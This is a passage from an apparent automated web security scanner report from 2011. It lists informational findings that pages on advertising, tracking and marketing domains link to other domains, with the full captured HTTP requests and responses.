The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99011741 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: https://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=26458;sz=1x1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 226
Date: Sun, 24 Apr 2011 03:08:31 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="https://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=26458;sz=1x1">here</a>
...[SNIP]...

23.89. http://by.optimost.com/trial/112/p/homepage.9c7/7/content.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /trial/112/p/homepage.9c7/7/content.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trial/112/p/homepage.9c7/7/content.js?D_ts=1303691677&D_tzo=300&D_loc=http%3A//www.truecredit.com/&D_ckl=1231 HTTP/1.1
Host: by.optimost.com
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Fast
P3p: CP="DEV IND NOI OTC OUR PSA PSD"
Content-Type: application/x-javascript
Expires: Mon, 25 Apr 2011 00:48:54 GMT
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:48:54 GMT
Content-Length: 13033
Connection: close
Cache-Control: max-age=0, no-cache, no-store

function opCreativeSetCookieA(n, v, d, e){var de = new Date;de.setTime(de.getTime() + e * 1000);document.cookie = n + "=" + escape(v) + ((e==null) ? "" : ("; expires=" + de.toGMTString())) + "; path=/
...[SNIP]...
<span style="position:relative; left: -6px;"><a href="https://www.truecredit.com/products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU" ><img src="https://promo.truecredit.com/Optimost_Test/Optimost_TC_Homepage_9-2010/Area_C_Hero_Image/image_C2_Reversed.png" border="0"><\/a><\/span><\/td><td style="vertical-align: top;"><img src="https://promo.truecredit.com/Optimost_Test/Optimost_TC_Homepage_9-2010/Area_B_Headline/image_B3_Headline.png" border="0"><br><br><a href="https://www.truecredit.com/products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU" ><img src="https://promo.truecredit.com/Optimost_Test/Optimost_TC_Home_4-2011/button.png" border="0" style="margin-top: -20px; margin-left: 0px;"><\/a>
...[SNIP]...
<div style="padding-left: 40px; display:none;"><img src="https://promo.truecredit.com/Optimost_Test/Optimost_TC_Homepage_9-2010/General_Images/Full_features_Tab.png" border="0"><\/div>
...[SNIP]...
<TD height="7"><IMG src="http://promo.truecredit.com/Optimost_Test/Optimost_TC_Home_5_10/Homepage_2/clear.gif" alt="" width="150" height="10"/><\/TD>
...[SNIP]...
<TD height="7"><IMG src="http://promo.truecredit.com/Optimost_Test/Optimost_TC_Home_5_10/Homepage_2/clear.gif" alt="" width="150" height="10"/><\/TD>
...[SNIP]...
<TD height="37"><IMG src="http://promo.truecredit.com/Optimost_Test/Optimost_TC_Home_5_10/Homepage_2/clear.gif" alt="" width="150" height="25"/><\/TD>
...[SNIP]...
<TD><IMG src="https://promo.truecredit.com/Optimost_Test/Optimost_TC_Home_4-2011/score_Scale.gif" alt="" width="344" height="124" style="margin-right: 25px; margin-left: 25px; margin-bottom: 25px;" /><img style="margin-bottom: 10px;" height="135" width="1" src="http://promo.truecredit.com/Optimost_Test/Optimost_TC_Home_5_10/Homepage_2/grayLine.gif"><IMG style="margin-left:20px;" src="https://promo.truecredit.com/Optimost_Test/Optimost_TC_Home_4-2011/image_ScoreSample.gif" alt="" width="328" height="145"/><\/TD>
...[SNIP]...
<TD class="footerText" valign="middle"><a href="http://www.truecredit.com/?fc_se=footerTab" name="/?fc_se=footerTab" onclick=\'nextpage=true\' >home<\/a>&nbsp;|\n\n \n\n <a href="http://www.truecredit.com/policy/privacy.jsp?fc_se=footerTab" name="/policy/privacy.jsp?fc_se=footerTab" onclick=\'nextpage=true\' >privacy<\/a>&nbsp;|\n\n \n\n <a href="http://www.truecredit.com/help/top3QuestionsNC.jsp?fc_se=footerTab" name="/help/top3QuestionsNC.jsp?fc_se=footerTab" onclick=\'nextpage=true\' >help<\/a>&nbsp;|\n\n \n\n <a href="http://www.truecredit.com/policy/termsOfUse.jsp?fc_se=footerTab" name="/policy/termsOfUse.jsp?fc_se=footerTab" onclick=\'nextpage=true\' >terms of use<\/a>
...[SNIP]...
<NOSCRIPT><a href="http://www.truecredit.com/affiliate?popup=true" name="/affiliate" >affiliate<\/a><\/NOSCRIPT>&nbsp;|\n\n \n\n <A href=https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" name="https://www.transunion.com/corporate/aboutUs/whoWeAre/companyStructure/transUnionInteractive.page?" target="_blank" onClick=\'nextpage=true\'>about<\/A>&nbsp;|\n\n \n\n <A href="http://www.truecredit.com/user/returnUser.jsp?fc_se=footerTab" name="/user/returnUser.jsp?fc_se=footerTab" onClick=\'nextpage=true\'>login<\/A>&nbsp;|\n\n \n\n <A href="http://www.truecredit.com/static/sitemap.jsp" name="/static/sitemap.jsp" onClick=\'nextpage=true\'>sitemap<\/A>
...[SNIP]...

23.90. https://cam.infusionsoft.com/cart/process  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /cart/process

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cart/process?packageCode=standard&affiliate=0 HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Referer: http://www.infusionsoft.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C137FB5113EEA15E639C83767C422E04; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 33219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="https://infusionmedia.s3.amazonaws.com/app/cam/style/styles.css"/>
<script type="text/javascript" src="/js/infusionsoft.js">
...[SNIP]...
</script>
<script type="text/javascript" src="https://api-secure.recaptcha.net/challenge?k=6LfPpboSAAAAAKIQsiPSXenzp30yQCjZM5j3UUPo&error=null"></script>
<noscript>
<iframe src="https://api-secure.recaptcha.net/noscript?k=6LfPpboSAAAAAKIQsiPSXenzp30yQCjZM5j3UUPo&error=null" height="300" width="500" frameborder="0"></iframe>
...[SNIP]...

23.91. http://cdn.apture.com/media/app.khtml.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.apture.com
Path:   /media/app.khtml.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /media/app.khtml.js?v=29213360 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Referer: http://cdn.apture.com/media/html/aptureLoadIframe.html?v=29213360
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:09 GMT
Server: PWS/1.7.1.5
X-Px: ht iad-agg-n25.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Thu, 28 Apr 2011 00:05:57 GMT
Age: 351252
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 254873
Last-Modified: Wed, 20 Apr 2011 23:52:28 GMT
Connection: keep-alive
Content-Length: 254873

apture.fileCache.load("app", "(function(){function p(){return null}function z(a,c){return function(){var e=this.parent;this.parent=c;var h=a.apply(this,arguments);this.parent=e;return h}}function g(a,
...[SNIP]...
<p class='aptureNeedFlash'>To continue, install the latest version of <a target=\\\"installFlash\\\" href='http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash'>Adobe Flash Player</a>
...[SNIP]...

23.92. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R99JaasWk_1847829791.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:28:58 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:02:25 GMT
Date: Sun, 24 Apr 2011 15:27:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6967

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.13;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.13;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1?">
<IMG SRC="http://ad.doubleclick.net/ad/N553.158901.DATAXU/B4970757.13;abr=!ie4;abr=!ie5;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.93. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R9ulNflD0_1008589149.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 15:08:20 GMT
Date: Sun, 24 Apr 2011 14:53:07 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1451

<iframe src="http://view.atdmt.com/DEI/iview/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
<noscript><a href="http://clk.atdmt.com/DEI/go/310322587/direct/01/" target="_blank"><img border="0" src="http://view.atdmt.com/DEI/view/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4" /></a>
...[SNIP]...

23.94. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_3gAKN5gK5X7NKmh2tAAE_twCii5ctWtVYQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjQ&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=299&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658465628&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658465633&frm=1&adk=2614322350&ga_vid=256767513.1303658466&ga_sid=1303658466&ga_hid=375503836&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:26:07 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Date: Sun, 24 Apr 2011 15:24:49 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1?">
<IMG SRC="http://ad.doubleclick.net/ad/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.95. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAiAANpvUK5YDJIocngE1dSdpWpJDKZEirOQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODA&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=380&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676635&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658635874&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658635885&frm=1&adk=2614322350&ga_vid=1031362686.1303658636&ga_sid=1303658636&ga_hid=1511491377&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:54 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 14:55:04 GMT
Pragma: no-cache
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx?">
</SCRIPT>
<NOSCRIPT>
